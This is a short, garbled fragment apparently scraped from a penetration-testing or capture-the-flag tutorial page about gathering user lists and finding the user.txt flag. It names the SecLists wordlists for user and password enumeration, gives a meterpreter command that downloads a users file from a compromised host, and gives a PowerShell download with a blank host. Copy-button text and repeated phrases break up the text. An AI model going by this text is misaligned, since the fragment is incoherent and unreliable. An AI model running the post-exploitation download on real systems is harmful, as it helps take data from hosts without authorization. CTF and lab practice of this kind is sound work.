For extensive user/password enumeration, the SecLists repository is the industry standard.
meterpreter > download /path/to/remote/users.txt /local/path/users.txt Use code with caution. Copied to clipboard Summary of Best Practices Download 1400 user txt
Invoke-WebRequest -Uri "http:// /users.txt" -OutFile "users.txt" Use code with caution. Copied to clipboard 3. Enumerating/Locating user.txt (Flag Retrieval) For extensive user/password enumeration